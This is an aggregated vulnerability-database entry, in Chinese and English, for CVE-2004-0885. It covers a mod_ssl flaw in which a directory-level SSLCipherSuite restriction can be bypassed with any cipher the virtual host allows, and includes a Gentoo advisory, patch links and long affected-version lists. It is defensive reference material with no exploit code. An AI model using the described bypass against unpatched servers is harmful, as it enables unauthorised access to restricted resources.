CVE-2004-0885
CVSS7.5
发布时间 :2004-11-03 00:00:00
修订时间 :2016-10-17 22:49:42
NMCOPS    

[原文]The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.


[CNNVD]Apache Mod_SSL SSLCipherSuite配置命令绕过漏洞(CNNVD-200411-033)

        
        Mod_SSL是Apache服务器上的SSL实现,用来为Apache Web服务器提供加密支持。
        Apache mod_ssl在某些配置下存在问题,远程攻击者可以利用这个漏洞绕过SSLCipherSuite配置命令的限制。
        当"SSLCipherSuite"指定某一目录或部分位置中配置需要受限的cipher套件,远程用户可以利用这个漏洞使用任何允许的cipher套件访问受限制目录或其他指定位置中的资源。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:apache:http_server:2.0.50Apache Software Foundation Apache HTTP Server 2.0.50
cpe:/a:apache:http_server:2.0.40Apache Software Foundation Apache HTTP Server 2.0.40
cpe:/a:apache:http_server:2.0.51Apache Software Foundation Apache HTTP Server 2.0.51
cpe:/a:apache:http_server:2.0.41Apache Software Foundation Apache HTTP Server 2.0.41
cpe:/a:apache:http_server:2.0.52Apache Software Foundation Apache HTTP Server 2.0.52
cpe:/a:apache:http_server:2.0.42Apache Software Foundation Apache HTTP Server 2.0.42
cpe:/a:apache:http_server:2.0.43Apache Software Foundation Apache HTTP Server 2.0.43
cpe:/a:apache:http_server:2.0.44Apache Software Foundation Apache HTTP Server 2.0.44
cpe:/a:apache:http_server:2.0.45Apache Software Foundation Apache HTTP Server 2.0.45
cpe:/a:apache:http_server:2.0.35Apache Software Foundation Apache HTTP Server 2.0.35
cpe:/a:apache:http_server:2.0.46Apache Software Foundation Apache HTTP Server 2.0.46
cpe:/a:apache:http_server:2.0.36Apache Software Foundation Apache HTTP Server 2.0.36
cpe:/a:apache:http_server:2.0.47Apache Software Foundation Apache HTTP Server 2.0.47
cpe:/a:apache:http_server:2.0.37Apache Software Foundation Apache HTTP Server 2.0.37
cpe:/a:apache:http_server:2.0.48Apache Software Foundation Apache HTTP Server 2.0.48
cpe:/a:apache:http_server:2.0.38Apache Software Foundation Apache HTTP Server 2.0.38
cpe:/a:apache:http_server:2.0.49Apache Software Foundation Apache HTTP Server 2.0.49
cpe:/a:apache:http_server:2.0.39Apache Software Foundation Apache HTTP Server 2.0.39

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:10384The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remot...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0885
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0885
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-033
(官方数据源) CNNVD

- 其它链接及资源

http://issues.apache.org/bugzilla/show_bug.cgi?id=31505
(UNKNOWN)  CONFIRM  http://issues.apache.org/bugzilla/show_bug.cgi?id=31505
http://lists.apple.com/archives/security-announce/2005//Aug/msg00001.html
(UNKNOWN)  APPLE  APPLE-SA-2005-08-17
http://lists.apple.com/archives/security-announce/2005/Aug/msg00000.html
(UNKNOWN)  APPLE  APPLE-SA-2005-08-15
http://marc.info/?l=bugtraq&m=109786159119069&w=2
(UNKNOWN)  BUGTRAQ  20041015 [OpenPKG-SA-2004.044] OpenPKG Security Advisory (modssl)
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102198-1
(UNKNOWN)  SUNALERT  102198
http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
http://www.apacheweek.com/features/security-20
(UNKNOWN)  CONFIRM  http://www.apacheweek.com/features/security-20
http://www.redhat.com/support/errata/RHSA-2004-562.html
(UNKNOWN)  REDHAT  RHSA-2004:562
http://www.redhat.com/support/errata/RHSA-2004-600.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:600
http://www.redhat.com/support/errata/RHSA-2005-816.html
(UNKNOWN)  REDHAT  RHSA-2005:816
http://www.redhat.com/support/errata/RHSA-2008-0261.html
(UNKNOWN)  REDHAT  RHSA-2008:0261
http://www.securityfocus.com/bid/11360
(UNKNOWN)  BID  11360
http://www.ubuntu.com/usn/usn-177-1
(UNKNOWN)  UBUNTU  USN-177-1
http://www.vupen.com/english/advisories/2006/0789
(UNKNOWN)  VUPEN  ADV-2006-0789
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01123
(UNKNOWN)  HP  HPSBUX01123
http://xforce.iss.net/xforce/xfdb/17671
(VENDOR_ADVISORY)  XF  apache-sslciphersuite-restriction-bypass(17671)

- 漏洞信息

Apache Mod_SSL SSLCipherSuite配置命令绕过漏洞
高危 未知
2004-11-03 00:00:00 2005-10-20 00:00:00
远程※本地  
        
        Mod_SSL是Apache服务器上的SSL实现,用来为Apache Web服务器提供加密支持。
        Apache mod_ssl在某些配置下存在问题,远程攻击者可以利用这个漏洞绕过SSLCipherSuite配置命令的限制。
        当"SSLCipherSuite"指定某一目录或部分位置中配置需要受限的cipher套件,远程用户可以利用这个漏洞使用任何允许的cipher套件访问受限制目录或其他指定位置中的资源。
        

- 公告与补丁

        厂商补丁:
        Apache
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级到Apache mod_ssl 2.0.53-dev:
        
        http://httpd.apache.org/

- 漏洞信息 (F34810)

Gentoo Linux Security Advisory 200410-21 (PacketStormID:F34810)
2004-10-27 00:00:00
Gentoo  security.gentoo.org
advisory
linux,gentoo
CVE-2004-0885
[点击下载]

Gentoo Linux Security Advisory GLSA 200410-21 - A flaw has been found in mod_ssl where the SSLCipherSuite directive could be bypassed in certain configurations if it is used in a directory or location context to restrict the set of allowed cipher suites.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200410-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: Apache 2, mod_ssl: Bypass of SSLCipherSuite directive
      Date: October 21, 2004
      Bugs: #66807
        ID: 200410-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

In certain configurations, it can be possible to bypass restrictions
set by the "SSLCipherSuite" directive of mod_ssl.

Background
==========

The Apache HTTP server is one of the most popular web servers on the
internet. mod_ssl provides SSL v2/v3 and TLS v1 support for Apache 1.3
and is also included in Apache 2.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                      Unaffected
    -------------------------------------------------------------------
  1  net-www/apache       < 2.0.52                           >= 2.0.52
                                                                 < 2.0
  2  net-www/mod_ssl      < 2.8.20                           >= 2.8.20
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

A flaw has been found in mod_ssl where the "SSLCipherSuite" directive
could be bypassed in certain configurations if it is used in a
directory or location context to restrict the set of allowed cipher
suites.

Impact
======

A remote attacker could gain access to a location using any cipher
suite allowed by the server/virtual host configuration, disregarding
the restrictions by "SSLCipherSuite" for that location.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Apache 2 users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=net-www/apache-2.0.52"
    # emerge ">=net-www/apache-2.0.52"

All mod_ssl users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=net-www/mod_ssl-2.8.20"
    # emerge ">=net-www/mod_ssl-2.8.20"

References
==========

  [ 1 ] CAN-2004-0885
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0885
  [ 2 ] Apache HTTPD Bug 31505
        http://issues.apache.org/bugzilla/show_bug.cgi?id=31505

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-21.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0
    

- 漏洞信息 (F34739)

mod_ssl-2.8.20-1.3.31.tar.gz (PacketStormID:F34739)
2004-10-26 00:00:00
 
encryption
CVE-2004-0885
[点击下载]

mod_ssl provides provides strong cryptography for the Apache 1.3 webserver via the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1). It is based on the SSL/TLS toolkit OpenSSL and supports all SSL/TLS related functionality, including RSA and DSA/DH cipher support, X.509 CRL checking, etc. Additionally it provides special Apache related facilities like DBM and shared memory based inter-process SSL session caching. per-URL SSL session renegotiations, DSO support, etc.

- 漏洞信息

10637
Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity

- 漏洞描述

Apache mod_ssl SSL CipherSuite contains a flaw that may allow a malicious user to bypass SSL CipherSuite access restrictions. The issue is triggered when the SSL CipherSuite directive is used with a directory context to require a restricted set of cipher suites. An attacker can use an alternate ciphersuite possibly allowing them to bypass access restrictions resulting in a loss of confidentiality and/or integrity.

- 时间线

2004-10-11 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.8.20-1.3.31 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
Design Error 11360
Yes No
2004-10-11 12:00:00 2008-06-30 11:52:00
Discovery of this issue is credited to Hartmut Keil.

- 受影响的程序版本

VMWare ESX Server 2.1.2
VMWare ESX Server 2.1.1
VMWare ESX Server 2.0.1 build 6403
VMWare ESX Server 2.0.1
VMWare ESX Server 2.0 build 5257
VMWare ESX Server 2.0
Turbolinux Turbolinux Server 10.0
Turbolinux Turbolinux Desktop 10.0
Turbolinux Home
Sun Solaris 10.0_x86
Sun Solaris 10.0
Sun Solaris 10
Slackware Linux 10.0
Slackware Linux 9.1
Slackware Linux 9.0
Slackware Linux 8.1
Slackware Linux 8.0
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0
RedHat Stronghold 4.0
RedHat Network Satellite (for RHEL 4) 4.2
RedHat Network Proxy (for RHEL 3) 4.2
Red Hat Red Hat Network Satellite Server 5.0
Red Hat Network Satellite (for RHEL 3) 4.2
Red Hat Network Proxy (for RHEL 4) 4.2
mod_ssl mod_ssl 2.8.18
mod_ssl mod_ssl 2.8.17
mod_ssl mod_ssl 2.8.16
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
mod_ssl mod_ssl 2.8.15
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
mod_ssl mod_ssl 2.8.14
+ Slackware Linux 9.0
mod_ssl mod_ssl 2.8.12
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
mod_ssl mod_ssl 2.8.10
- Apache Software Foundation Apache 1.3.26
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Slackware Linux 8.1
mod_ssl mod_ssl 2.8.9
- Apache Software Foundation Apache 1.3.26
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ HP Secure OS software for Linux 1.0
+ Slackware Linux 8.1
mod_ssl mod_ssl 2.8.8
- Apache Software Foundation Apache 1.3.24
mod_ssl mod_ssl 2.8.7
+ Apache Software Foundation Apache 1.3.23
+ MandrakeSoft Multi Network Firewall 2.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
mod_ssl mod_ssl 2.8.6
+ Apache Software Foundation Apache 1.3.22
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.16
+ Apache Software Foundation Apache 1.3.15
+ Apache Software Foundation Apache 1.3.14 Mac
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.13
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.7 -dev
+ Apache Software Foundation Apache 1.3.6
+ Apache Software Foundation Apache 1.3.4
+ Apache Software Foundation Apache 1.3.3
+ Apache Software Foundation Apache 1.3.1
+ Apache Software Foundation Apache 1.3
+ Apache Software Foundation Apache 1.2.5
+ Apache Software Foundation Apache 1.2
+ Compaq Compaq Secure Web Server for OpenVMS 1.2
+ Compaq Compaq Secure Web Server for OpenVMS 1.1 -1
+ Compaq Compaq Secure Web Server for OpenVMS 1.0 -1
+ Compaq Compaq Secure Web Server for Tru64 5.5.2
mod_ssl mod_ssl 2.8.5 -2
- Apache Software Foundation Apache 1.3.22
mod_ssl mod_ssl 2.8.5 -1
mod_ssl mod_ssl 2.8.5
+ Apache Software Foundation Apache 1.3.22
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.16
+ Apache Software Foundation Apache 1.3.15
+ Apache Software Foundation Apache 1.3.14 Mac
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.13
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.7 -dev
+ Apache Software Foundation Apache 1.3.6
+ Apache Software Foundation Apache 1.3.4
+ Apache Software Foundation Apache 1.3.3
+ Apache Software Foundation Apache 1.3.1
+ Apache Software Foundation Apache 1.3
+ Apache Software Foundation Apache 1.2.5
+ Apache Software Foundation Apache 1.2
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0
mod_ssl mod_ssl 2.8.4
+ Apache Software Foundation Apache 1.3.22
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.16
+ Apache Software Foundation Apache 1.3.15
+ Apache Software Foundation Apache 1.3.14 Mac
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.13
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.7 -dev
+ Apache Software Foundation Apache 1.3.6
+ Apache Software Foundation Apache 1.3.4
+ Apache Software Foundation Apache 1.3.3
+ Apache Software Foundation Apache 1.3.1
+ Apache Software Foundation Apache 1.3
+ Apache Software Foundation Apache 1.2.5
+ Apache Software Foundation Apache 1.2
+ MandrakeSoft Single Network Firewall 7.2
+ Slackware Linux 8.1
mod_ssl mod_ssl 2.8.3
+ Apache Software Foundation Apache 1.3.22
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.16
+ Apache Software Foundation Apache 1.3.15
+ Apache Software Foundation Apache 1.3.14 Mac
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.13
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.7 -dev
+ Apache Software Foundation Apache 1.3.6
+ Apache Software Foundation Apache 1.3.4
+ Apache Software Foundation Apache 1.3.3
+ Apache Software Foundation Apache 1.3.1
+ Apache Software Foundation Apache 1.3
+ Apache Software Foundation Apache 1.2.5
+ Apache Software Foundation Apache 1.2
mod_ssl mod_ssl 2.8.2
+ Apache Software Foundation Apache 1.3.22
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.16
+ Apache Software Foundation Apache 1.3.15
+ Apache Software Foundation Apache 1.3.14 Mac
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.13
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.7 -dev
+ Apache Software Foundation Apache 1.3.6
+ Apache Software Foundation Apache 1.3.4
+ Apache Software Foundation Apache 1.3.3
+ Apache Software Foundation Apache 1.3.1
+ Apache Software Foundation Apache 1.3
+ Apache Software Foundation Apache 1.2.5
+ Apache Software Foundation Apache 1.2
mod_ssl mod_ssl 2.8.1 -2
+ Apache Software Foundation Apache 1.3.19
mod_ssl mod_ssl 2.8.1
+ Apache Software Foundation Apache 1.3.22
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.16
+ Apache Software Foundation Apache 1.3.15
+ Apache Software Foundation Apache 1.3.14 Mac
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.13
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.7 -dev
+ Apache Software Foundation Apache 1.3.6
+ Apache Software Foundation Apache 1.3.4
+ Apache Software Foundation Apache 1.3.3
+ Apache Software Foundation Apache 1.3.1
+ Apache Software Foundation Apache 1.3
+ Apache Software Foundation Apache 1.2.5
+ Apache Software Foundation Apache 1.2
+ RedHat Secure Web Server 3.2 i386
mod_ssl mod_ssl 2.8
+ Apache Software Foundation Apache 1.3.22
+ Apache Software Foundation Apache 1.3.22
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.16
+ Apache Software Foundation Apache 1.3.16
+ Apache Software Foundation Apache 1.3.15
+ Apache Software Foundation Apache 1.3.15
+ Apache Software Foundation Apache 1.3.14 Mac
+ Apache Software Foundation Apache 1.3.14 Mac
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.13
+ Apache Software Foundation Apache 1.3.13
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.7 -dev
+ Apache Software Foundation Apache 1.3.7 -dev
+ Apache Software Foundation Apache 1.3.6
+ Apache Software Foundation Apache 1.3.6
+ Apache Software Foundation Apache 1.3.4
+ Apache Software Foundation Apache 1.3.4
+ Apache Software Foundation Apache 1.3.3
+ Apache Software Foundation Apache 1.3.3
+ Apache Software Foundation Apache 1.3.1
+ Apache Software Foundation Apache 1.3.1
+ Apache Software Foundation Apache 1.3
+ Apache Software Foundation Apache 1.3
+ Apache Software Foundation Apache 1.2.5
+ Apache Software Foundation Apache 1.2.5
+ Apache Software Foundation Apache 1.2
+ Apache Software Foundation Apache 1.2
IBM Hardware Management Console (HMC) for pSeries 4.0 R2.0
IBM Hardware Management Console (HMC) for pSeries 3.3.2
IBM Hardware Management Console (HMC) for iSeries 4.0 R2.0
IBM Hardware Management Console (HMC) for iSeries 3.3.2
HP HP-UX B.11.23
HP HP-UX B.11.22
HP HP-UX B.11.11
HP HP-UX B.11.11
HP HP-UX B.11.04
HP HP-UX B.11.00
Conectiva Linux 10.0
Avaya Network Routing
Avaya Modular Messaging (MSS) 2.0
Avaya Modular Messaging (MSS) 1.1
Avaya MN100
Avaya Intuity LX
Avaya Communication Manager 2.0.1
+ Avaya Communication Manager Server DEFINITY Server SI/CS
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
+ Avaya Communication Manager Server S8700
Avaya Communication Manager 2.0
+ Avaya Communication Manager Server DEFINITY Server SI/CS
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
+ Avaya Communication Manager Server S8700
Avaya Communication Manager 1.3.1
+ Avaya Communication Manager Server DEFINITY Server R10
+ Avaya Communication Manager Server DEFINITY Server R10
+ Avaya Communication Manager Server DEFINITY Server R11
+ Avaya Communication Manager Server DEFINITY Server R9
+ Avaya Communication Manager Server DEFINITY Server R9
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
+ Avaya Communication Manager Server S8700
Avaya Communication Manager 1.1
+ Avaya Communication Manager Server DEFINITY Server R10
+ Avaya Communication Manager Server DEFINITY Server R10
+ Avaya Communication Manager Server DEFINITY Server R11
+ Avaya Communication Manager Server DEFINITY Server R9
+ Avaya Communication Manager Server DEFINITY Server R9
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
+ Avaya Communication Manager Server S8700
Apple Mac OS X Server 10.3.9
Apache Software Foundation Apache 2.0.52
+ Apple Mac OS X 10.3.6
+ Apple Mac OS X 10.2.8
+ Apple Mac OS X Server 10.3.6
+ Apple Mac OS X Server 10.2.8
+ Red Hat Enterprise Linux AS 4
+ RedHat Desktop 4.0
+ RedHat Enterprise Linux ES 4
+ RedHat Enterprise Linux WS 4
+ Sun Solaris 10
Apache Software Foundation Apache 2.0.51
Apache Software Foundation Apache 2.0.50
+ Mandriva Linux Mandrake 10.1 x86_64
+ Mandriva Linux Mandrake 10.1
Apache Software Foundation Apache 2.0.49
+ S.u.S.E. Linux Personal 9.1
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Apache Software Foundation Apache 2.0.48
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ S.u.S.E. Linux Personal 8.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Apache Software Foundation Apache 2.0.47
+ Apple Mac OS X Server 10.3.5
+ Apple Mac OS X Server 10.3.4
+ Apple Mac OS X Server 10.3.3
+ Apple Mac OS X Server 10.3.2
+ Apple Mac OS X Server 10.3.1
+ Apple Mac OS X Server 10.3
+ Apple Mac OS X Server 10.2.8
+ Apple Mac OS X Server 10.2.7
+ Apple Mac OS X Server 10.2.6
+ Apple Mac OS X Server 10.2.5
+ Apple Mac OS X Server 10.2.4
+ Apple Mac OS X Server 10.2.3
+ Apple Mac OS X Server 10.2.2
+ Apple Mac OS X Server 10.2.1
+ Apple Mac OS X Server 10.2
+ Apple Mac OS X Server 10.1.5
+ Apple Mac OS X Server 10.1.4
+ Apple Mac OS X Server 10.1.3
+ Apple Mac OS X Server 10.1.2
+ Apple Mac OS X Server 10.1.1
+ Apple Mac OS X Server 10.1
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
Apache Software Foundation Apache 2.0.46
+ Red Hat Enterprise Linux AS 3
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ Trustix Secure Linux 2.0
Apache Software Foundation Apache 2.0.45
- Apple Mac OS X 10.2.6
- Apple Mac OS X 10.2.5
- Apple Mac OS X 10.2.4
- Apple Mac OS X 10.2.3
- Apple Mac OS X 10.2.2
- Apple Mac OS X 10.2.1
- Apple Mac OS X 10.2
- Apple Mac OS X 10.1.5
- Apple Mac OS X 10.1.4
- Apple Mac OS X 10.1.3
- Apple Mac OS X 10.1.2
- Apple Mac OS X 10.1.1
- Apple Mac OS X 10.1
- Apple Mac OS X 10.1
- Apple Mac OS X 10.0.4
- Apple Mac OS X 10.0.3
- Apple Mac OS X 10.0.2
- Apple Mac OS X 10.0.1
- Apple Mac OS X 10.0
+ Conectiva Linux 9.0
Apache Software Foundation Apache 2.0.44
Apache Software Foundation Apache 2.0.43
Apache Software Foundation Apache 2.0.42
Apache Software Foundation Apache 2.0.41
Apache Software Foundation Apache 2.0.40
